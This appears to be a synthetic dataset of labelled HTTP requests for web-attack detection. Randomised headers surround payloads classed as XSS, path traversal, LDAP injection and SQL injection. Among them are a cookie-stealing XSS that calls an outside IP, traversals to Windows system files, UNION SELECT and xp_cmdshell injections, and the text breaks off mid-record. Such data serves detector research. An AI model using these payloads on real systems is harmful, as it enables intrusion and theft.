ETag: "v_dCT6QcvMRM03vgD95"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 27 Oct 09 13:05:43 UTC
If-Unmodified-Since: Fri, 22 Aug 08 23:30:39 UTC
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 67
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: nicsTy xifE=unDear
Range: -1,-1839
Referer: http://www.Gfir.cz/n7ccekla/4Ahrx/NNdtn0H.asmx
TE: deflate;q=0.5,trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 0.0; ei-8n; rv:7.6.2) Gecko/83983606
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 174x8533
Via: 2.4 57.208.101.253, een/1.5 173.110.188.137
Transfer-Encoding: identity
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 491 www.obverec.js "eapntohnl" "Thu, 19 May 05 14:19:45 GMT"
X-Forwarded-For: 219.76.123.80
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oocosN=b jizrmfMc&&hciraeAwqa=27&U-r.B=8946&vwsom=oyehttpe&jmailZ3=tpdehreplaceL&4ao7dea5Atnilin=murtprh2g0ss&oldm5=eA'     or     (i  <   count(zsages/child::text())    and  j <     count(aa26a/child::comment())  and     k  <   count(iC/child::*)   )    or   'd7lnu'='     tgxie'  or&otwo=ebslLs1&2vUH7E=02&tgtdaibo=neo7Rewe5eooo0&wis=bypnnterilf2ao&mtaegerorohh=ynhed&siS702m=ectb&eftae=ftptsebreop2otelneti

End - Id: 35560
Start - Id: 46782
class: XSS
POST /aeya/ibMa/wewm3e/oio/ldG4QONVExUTouHn-X/oZExBMdC8a5OB/1zjwd/hneelitqeaega13to/OZvpasswdtm/pWelNtre.html? HTTP/1.1
Content-Length: 345
Content-Language: aR
Content-Encoding: compress
Content-Location: http://www.tltyecaf.it/vpryn/tn3ed/fafn.asmx
Content-MD5: bG1odXMwZW5tZXRvNGhuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 06:27:18 CET
Last-Modified: Mon, 02 Feb 09 03:56:42 GMT
Host: 35.97.90.164
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 136.64.152.159
Cookie: etidl=stylehtn?yrjef1Do]najg ;dn=aZnltupdate-;2dwoapmnu6at=in?ii;NSd4osI4weREk=rwnnlAatnecjueo7is;fablu=tjbodydT07d/rt;hfrfrcnoacU0t=ndsock_streama@nsstT4ut
Cookie2: $Version="410"
Date: Wed, 13 Jan 10 02:18:24 CET
ETag: "OrrJjm8kUjw1OpzMA"
Expect: gEnx
From: fnwte@lpuewgs.de
If-Modified-Since: Sun, 03 Dec 06 17:17:08 GMT
If-Unmodified-Since: Wed, 15 Dec 04 18:00:22 GMT
If-Match: *
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 885
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 462-
Referer: /lozidTai/yOran9/sca1nd/oner.js
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/0.8 (compatible; tp8yr; SunOS sun4u; lSdeN)
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1199x1516
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fswo=bing&orrTJEklstmus=otform(v&seredwss=c&llesltmhR=sllog@&olm6r9fn=reoneosq&ratnllr5=mN11YjEqSdk6&JUU0KX-oD=ttht&rq8=94&Ob_var=thPd&Fegr3eOniaq=05&8tftasoersout=<div style =    "    background-image:   url(javascript:   [window.open('http://235.10.188.245/taeltr.mdb'+document.cookie);]);   " >

End - Id: 46782
Start - Id: 44876
class: PathTransversal
GET /tuprlsaaCbie/s4698HmWUd6.jpeg?baceSsdecozt=t&dqEZz=file%3A%2F%2F%2Fy%3A%2Fei%2Fzsna%2Freritt.xml HTTP/1.0
Host: www.c6ahrl.cz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250, x-mac-korean;q=0.6, big5
Accept-Encoding: compress;q=0.1, compress;q=0.4, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 32.25.74.7
Cookie: 55ctskeyg=djgn
Cookie2: $Version="6"
Date: Wed, 13 Jan 10 20:51:21 UTC
ETag: "udDi1mJbf1wg0EaH"
Expect: ritRee
From: reecos@eeesftcx.gov
If-Modified-Since: Fri, 15 Jan 10 15:58:51 GMT
If-Unmodified-Since: Mon, 10 Sep 07 07:07:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: E6i4en cnemics=iaikur
Authorization: NTLM c2hFbXNEbHNvZGEzd2VmbnNldHR5c28zbG9yZWNzaXJkb2VoYW5wcGhtZ2FvbWM=
Range: -41,56231-,-8575
Referer: /o6Ji1/osxnr.fgf
TE: gzip,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (Windows; U; Windows NT 8.0; da-sb; rv:8.2.6) Gecko/72194336
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: 4.9 www.rgah.html, 3.1 63.170.190.107:4, 4.8 www.G6selin.shtml
Transfer-Encoding: mhSsr1
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44876
Start - Id: 36124
class: PathTransversal
GET /j6ibg2488l/babmnv9eeemh6lesC/nyeu/Z5JIX2xYmibc2uu/swohwop/tYwRGgnYrvzCN/16Y@h0I9.5L/btYesiaee5rDOyGe/ri2baegecs2lti70dee/e5au/wR/hedazreUoqi7inRme.cgi?ajWXJ1a=1&Obodkws3at=9mi5uyaietes&DDCrNv.=0796825846&rhe8BwEr7isT=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&eE=1087 HTTP/1.0
Host: 157.98.206.78
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ac-glta, a-seegs, ni-3;q=0.9, hlhjn-D, sdm-8nf
Cache-Control: no-transform
Client-ip: 183.126.190.215
Cookie: kto3OqTy.z_=eautoexectrw0delf2andhaopt;ZeH7OiD=eHhs
Cookie2: $Version="5"
Date: Thu, 21 Oct 04 03:33:55 GMT
ETag: "O@wdOljLOEMWn41hVasM"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Fri, 05 Jun 09 11:01:55 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "0DaHq-f_qTdCAPg"
If-Range: "VKsM3rQokwRGUG5V"
Max-Forwards: 7376
MIME-Version: 7.2
Pragma: t=c
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest uri=http://heotdgs.de/i1ooVn/irsk5m0/rm8chd.txt
Range: -984
Referer: http://www.qesad.org/oaf9sa/dkidtd/foarpa/1jhr5/ma7htrv9.dll
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.5 (Windows; U; Win98 8.1; WL-Le; rv:1.5.1) Gecko/90441564
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: HTTP/9.7 www.rEzn.gif
Transfer-Encoding: identity
Upgrade: qsat/1.5, cnarW/6.7
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 62.96.238.58
X-Serial-Number: 15784658
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36124
Start - Id: 38612
class: LdapInjection
GET /bjRcYhf6wxYM/lhmldutoieerL/lyos8slfrwpel/z8jkBo-nSrnJu@..php3?ppasswdMtlB=wh4fhnsTydkhaiialx&LR0servicesZrmnfromL4w=631383709&e31aatiesea=ijoD3Ldg&kXsN=%29++%28++%7C+%28tstcc%3Dts21d*%29&tnnpt=f3iln&fghcrb=ur9nn43a%7Cueo&7tre=94051&cTdixegsbld=1&EEszcopyUzX=Of&h2tpdrlrymtarl=3941651&et8ae=4ahreWrj&mearnEhI6=aneR6+5arn&MijoPbleNsctm=5%7CnS%27+vmat HTTP/1.1
Host: www.zr1Wu.fr:4
Connection: 8e4l
Accept: image/gif;q=0.1, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.6, deflate, gzip;q=0.1, compress, deflate
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="74"
Date: Mon, 23 Nov 09 14:57:00 UTC
ETag: W/"B3TaHLjmBKNvfeU"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Thu, 19 Jul 07 05:18:49 UTC
If-Unmodified-Since: Sat, 17 Dec 05 01:07:13 CET
If-Match: *
If-None-Match: "nXgL6Y2iYeKg7yUT"
If-Range: "jS8_NKk2acADu6izVoC"
Max-Forwards: 2116
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: e8bit dAimya=iueu5his
Range: -348176
Referer: /aaonsu/iifnoe/spiagTil/eiicoe/en3e.jpeg
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 9.2; nn-et; rv:5.9.3) Gecko/84869557
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 6.2 www.etsq.js
Transfer-Encoding: gzip
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 557 www.qUo1.jpeg "esote5naNsdrk" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38612
Start - Id: 41380
class: SqlInjection
PUT /aXA.jpeg? HTTP/1.1
Content-Length: 268
Content-Language: N,uomcdo,hnmamooh
Content-Encoding: compress
Content-Location: http://www.mous15Ur.gov/ohNEx/acseybg/astcoiiz/ozde9/25twUd.sh
Content-MD5: c3liaXNlbjlodDFHMTJnMw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Wed, 15 Mar 06 15:57:50 GMT
Host: 22.148.152.89
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: waT4b='zl'
Client-ip: 93.72.204.142
Cookie: mniudesi=tue
Cookie2: $Version="30"
Date: Fri, 14 May 04 06:21:53 UTC
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Sat, 21 Jan 06 21:58:07 GMT
If-Match: "I7Wz--cPV01sT3@B"
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ZHdnN2E4YWFhZ25uNG5zaGVhdGhlaW5ibnVhZXNla3VkRQ==
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: -49879
Referer: http://aenra.be/wobr/jiMaaeg/ryeanr/hUn2lan.zip
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 2.3; rr-e4; rv:9.8.4) Gecko/19646866
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: 2.8 170.150.60.113
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ab=8kTjar9h9&KI.bL9b=764&rt='   )   UNION    ALL SELECT    pbcbd0oe FROM    rakod    WHERE  (   ''    = '&grN8wenth=804&eeh4=6639&xn=oP0C&soosnha=mSCUJdWr5pI_&TRnulltP5Rboot.ini7=DRaMgfe&F-JNYjrEechozvary=iyeRgwf7CN@f&ks2xnt95=6&sma5sve=tdaHwgssdEtuav2

End - Id: 41380
Start - Id: 38173
class: LdapInjection
GET /s5K/b3/mWhKjjDsoWC1L/63GG/s.tQ3eYYCQnN@pN/sn3RwWVUP5hYuy147k/5n_szs8Z/ifct6o3ceul/zno/x-M1QVsock_streammVVprocessing-instruction/Rp0.gif?S6.zfw5U3IY=EotdeUua4iiiint&ghrn9my=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sin0zehoet=57651544 HTTP/1.0
Host: www.Diastuw.biz
Connection: klnx
Accept: video/quicktime;q=0.8, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.1, deflate, deflate, gzip
Accept-Language: ehmrezoo-n6;q=0.0, Qaze-uniaj;q=0.9, athAsuv-oiiSunt2;q=0.0
Cache-Control: max-age=959
Client-ip: 170.20.121.37
Cookie: e6wtesdsc=aNvBe_cNkq;imgbody.Eq=a2ow93airur9e1;fhnevit=Mi;Daccess_logEA=xs@sOwinnt(
Cookie2: $Version="352"
Date: Sat, 26 Jan 08 14:32:16 CET
ETag: W/"vvFa0fGEYN0n5p.x"
Expect: akppg
From: dipgxt@5huagprh.de
If-Modified-Since: Mon, 27 Apr 09 20:48:10 UTC
If-Unmodified-Since: Tue, 05 Apr 05 01:00:07 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 19:04:29 UTC
Max-Forwards: 0839
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic Z3JzYXNlMDplb2hzNWtxZA==
Authorization: Digest opaque="apo2Yo"
Range: -58269,-622
Referer: http://e4krnja.st/anopman5/ndnjTena/hOibci2e/rdobent/eln9c.asmx
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: enamgtdi (cpindFJgB; tyAe_y; jBWYw9xv; n.LakuuWG; vElh-Y6)
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5047
Via: 0.7 www.Bzmztzs4.tiff, gow/4.4 252.47.72.194
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38173
Start - Id: 47101
class: XSS
GET /r1o5yBC4X@updateerlibN/window.openZLLCmdtmp7@_autoexecj0G/9urhnesndn2sspSdn4r/pNdHoChl.cfm?styhec4=Tl-%26eo&dbsenne=ejPMRqm7KLZ&emtaa=%27&aselr=544543&ndPuus2e7d=lP0ydgxrefL&@Vu9wHrd=5Az4kwOtE1Z&iaexeisVhlbvsyZ=aTitvar0e&wgg=%3Cxml+++++src++%3D++%22++javascript%3A++++%5Balert+%28%27elt24eedj%27%29%3B%5D+++%22+++%3E&wEeoOyoama=ety&0p0ioniEvakZs=G HTTP/1.1
Host: 14.215.3.151:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, compress, deflate;q=0.6
Accept-Language: usfnhoth-dnmaoomh;q=0.3, naoutdr-5oi
Cache-Control: no-cache
Client-ip: 51.141.13.228
Cookie: ikMhpe=oNlwwa~akz;sititd2=lkmuFU3g
Cookie2: $Version="1"
Date: Tue, 24 May 05 18:44:29 CET
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: SuneNo=naithni;emlsz
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 21 May 04 11:44:49 CET
If-Unmodified-Since: Sat, 06 Oct 07 07:07:00 UTC
If-Match: "Vgdv77E8Qywy77kX5A9"
If-None-Match: "Tnw7pnDlBwV9uyUb96h"
If-Range: Sat, 02 Jun 07 19:13:50 CET
Max-Forwards: 77
MIME-Version: 2.8
Pragma: pNdse2w='ntoo'
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: /eAZeMpeg/Osbn0e.cgi
TE: deflate;q=0.8,gzip,chunked;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 2.7; ht-ee; rv:9.9.6) Gecko/31827465
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 320x898
Via: HTTP/2.3 www.ice5n5tt.png
Transfer-Encoding: bhu3; bcqahef=eintli
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47101
Start - Id: 36092
class: PathTransversal
GET /hrWCLphUMyDdj9/p04N3WqbinIiM/include2VEK45C/i-D@Xzh/tssVHk79/r3bwTeq6_M_bNCyAM4/aca70LYQR3b/c7ies/@1c0.Q7osL.dll?dt=a%3A%5C%5CWINNT%5C%5Cwin.ini&1MNj4Zr8=%3Cemud HTTP/1.0
Host: www.4jR6mh.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: StrEa4tf-zdlgstz;q=0.2
Cache-Control: no-transform
Client-ip: 142.104.22.126
Cookie: halupuchyg=30736;TOdgYC=0;UFUr1-vJxu=l9Q_F@oC;esptoho0Nsdea5=831467;eectoydnso=4;bqeqtAsRe=48429145
Cookie2: $Version="56"
Date: Fri, 30 Nov 07 22:23:32 UTC
ETag: W/"Y2c3Smyqo1dEDpGFg_"
Expect: urhmnt=re1d
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 25 Oct 04 20:58:02 UTC
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: "QVsJ.ZguPpzRQhYOp8d"
Max-Forwards: 73
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest username="ftps"
Authorization: rtt8d pqeoe=bouttla
Range: 580617-399630,-49399
Referer: http://www.nl0zg5.com/e2l2ntn/dbnoouar/ar2uoY/Xhul/5oxewaR.doc
TE: trailers,deflate;q=0.7,trailers
Trailer: Pragma
User-Agent: o6ietp
UA-CPU: 68000
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5584x598
Via: 1.3 www.hlkbtat.css:41, FTP/9.0 255.117.144.31
Transfer-Encoding: compress
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 521332915
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36092
Start - Id: 41034
class: SqlInjection
GET /FiWNpasswdlocationh-o/6IWd.YU/nt6cs/t7/h5sRZEHgViaWEJ4xfJ6/ectytaAhYa25E3/H7sttragse/4pdeetl/passthruxj/sGU5ZK4I5.sh?r0neOe=t-Rkyh&ioreap=bEhdeibSnnYRSn&sibp6cibjgnopN=884&Of1qnodeo=exec++++xp_cmdshell+%27%22qa%22+++++%3E%3E+script.vbs%27&ehnhor4oYd=edpui6me2eWnnN&yghynT=0977&rhwatone=ssnssreuF%5Deleug&naanYhbdotthe=8eltO&36ieumDip=sii%25n&onrs=buyWurrls2b HTTP/1.1
Host: www.wf96l.com
Connection: tecethi
Accept: audio/*, audio/*, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="1"
Date: Thu, 23 Sep 04 08:18:52 UTC
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: a1tlic@rsdn.ch
If-Modified-Since: Mon, 17 Apr 06 16:05:47 CET
If-Unmodified-Since: Sat, 09 Jul 05 20:16:11 CET
If-Match: "8IsSfI-pj9BA.VO"
If-None-Match: *
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 18
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 956-40926
Referer: /Ebp8/AatoEt6.tar
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 5.0; gn-nG; rv:4.9.9) Gecko/12220018
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6152x736
Via: FTP/4.1 www.3n5qmpt.htm:47, FTP/8.6 www.npluon.css, HraieI/4.7 www.ac6keih.shtml
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 151 www.aseNtTKn.shtml "wntnn1nnvnehztTtrwO" "Fri, 15 Dec 06 03:39:44 GMT"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41034
Start - Id: 44638
class: PathTransversal
GET /BXZA3rEP-l/etrixu/eUquEugcz7Bn.css? HTTP/1.0
Host: 214.56.49.2:78695
Connection: ekg4
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: etait='fe'
Client-ip: 95.91.76.121
Cookie: oapcmgr1=4854
Cookie2: $Version="9"
Date: Thu, 25 Dec 08 21:21:51 CET
ETag: "dpXSh8Z-yIwmS16F7"
Expect: 100-continue
From: sene@eakbEa.biz
If-Modified-Since: Wed, 27 Jul 05 17:02:32 UTC
If-Unmodified-Since: Fri, 27 Oct 06 09:39:01 GMT
If-Match: "aeA2GbMEww0zFvtl"
If-None-Match: *
If-Range: Thu, 08 Jan 09 24:45:35 UTC
Max-Forwards: 97
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest qop=2nwtea
Authorization: lidz eaeEa=4rennsEc
Range: -91317,1-,143349-680394
Referer: http://5at9uo.biz/knRona/Oploes/igbkuem.rar
TE: trailers,trailers
Trailer: Trailer
User-Agent: doc(     file:///c:/ihe3i/yidf.xml )
UA-CPU: x86
UA-Disp: 570,026,32
UA-OS: FreeBSD
UA-Color: color8
Via: HTTP/2.9 167.154.105.138:4, 4.1 www.6oeA.shtml, HTTP/2.3 191.238.50.142
Transfer-Encoding: identity
Upgrade: li4Qh/6.8
X-Serial-Number: 78282419724364681
----: -------------------------

null

End - Id: 44638
Start - Id: 37773
class: LdapInjection
GET /taerrezTjreol5/aewesue8recIrbqsnotE.swf?eawnoumtwnsebo=9519&eaensSgt=073&Nlddie=%2Finsert%24&ehoeIOwelsnat=+bo&deoaxakH7w=aeeanmssmeWk4nrLs&Mrzi=ro&jetauooyla0ebn3=enae%29%28+%7C+%28cz%3D*%29&hts=p6jsn%3Ep%27la%24nestyle&6a2coihba=irIsp&una9tea=074 HTTP/1.1
Host: 190.211.126.60
Connection: tmn04t
Accept: image/png;q=0.6, video/*;q=0.7
Accept-Charset: euc-cn, euc-kr, x-mac-roman, gb2312
Accept-Encoding: *
Accept-Language: ise3Ame-smt48rtt;q=0.9, rosl8th-dze7, h-Lwiwno, 8e3tnhe-EfrrnA;q=0.0
Cache-Control: max-age=14
Client-ip: 3.137.158.163
Cookie: cadmerd=nrub;trEirsa=145;lp=f gpt$e;gfstt=2722297;ovetn=77254;ft=55891
Cookie2: $Version="186"
Date: Sun, 05 Jul 09 24:04:52 CET
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Mon, 06 Feb 06 08:24:43 CET
If-Unmodified-Since: Fri, 05 Dec 08 18:31:22 UTC
If-Match: "7_mk2jJhNLBLRmDE__Lg"
If-None-Match: *
If-Range: Sun, 20 Jun 04 07:58:20 GMT
Max-Forwards: 609
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic ZTdhYWNjdDpldWR3aG1lNQ==
Authorization: NTLM d3RlYnRzZGVzZXRodGNpOGdDN3ZpQWVlM2V0YWViMnViYWFhZWFkbw==
Range: -6185,-86
Referer: /nggdey/tauidT/bInZ/93s3ta/5rioct.gz
TE: gzip;q=0.8,gzip;q=0.2,gzip
Trailer: Range
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 7.3; to-nE; rv:4.9.0) Gecko/99459611
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 2.7 185.236.219.232, 0.0 www.oztrfu.shtml
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37773
Start - Id: 37249
class: LdapInjection
GET /istLa9toahunidhlht/uraNrenrieom/enOrLxarhsiiA3g/lEse5toe/h9/tGzbdr.YfOgJeUaa7uAi/o6l6h/r57xFw.jsp?zeeiurauoedn=zeOntet8ol%2F%25&nQdropSTH7v5L=17%29%28%26%28objectClass%3Dt7wb%29%28%7C%28sn++%3D+++0n4r%29%28cn%3Dj+++++J*%29%29&2u=ba HTTP/1.1
Host: www.tmreShmtkn.cz
Connection: keep-alive
Accept: application/rtf
Accept-Charset: x-mac-chinesesimp;q=0.6, x-mac-chinesetrad;q=0.5, x-mac-arabic, euc-jp
Accept-Encoding: 
Accept-Language: 5Rtveke-sepetll, soq-gujmlia;q=0.3, yei-t7btair;q=0.9, id-aohu;q=0.1
Cache-Control: d7begie=ly8peus
Client-ip: 112.64.200.186
Cookie: sncejlghdzaip=b70ses scnnjeHchE~z;@oVKbbodyqvOQ9=09919;IioptmPCreplacelAO6=241;iE0rcpopenj5m_bAD=e_pRV;alsom51ao=u@W9as
Cookie2: $Version="04"
Date: Sat, 16 May 09 03:57:53 CET
ETag: W/"6-4YAl_C57LZ5Kihr"
From: tlclo@pOIec.be
If-Modified-Since: Thu, 05 Mar 09 24:37:21 UTC
If-Match: *
If-None-Match: *
If-Range: "nTac.7.eZ6zY7QrY2Z"
Max-Forwards: 34
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic cmlzMG5yZToxNWFlOWE=
Referer: /oSfcjt/e0azn/ueehgt.mspx
Trailer: Referer
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 5.7; gd-qn; rv:5.5.1) Gecko/42445525
UA-CPU: 68000
UA-Color: color32
UA-Pixels: 1371x144
Via: 0.8 40.69.88.183, FTP/1.4 www.eeylu7t.gif:4876, 3.3 www.aooza3.jpg
Transfer-Encoding: compress
----: ------------------------------------------

null

End - Id: 37249
Start - Id: 45190
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.thenqenkui.biz
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: emShetno-92Eo, xtmhgnp-3fw, Ker-hihten, e-gnaET6e5;q=0.5
Cache-Control: no-transform
Client-ip: 30.124.242.244
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 26 Mar 04 20:53:03 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Fri, 12 Oct 07 06:38:05 CET
If-Unmodified-Since: Thu, 10 Feb 05 09:44:14 CET
If-Match: *
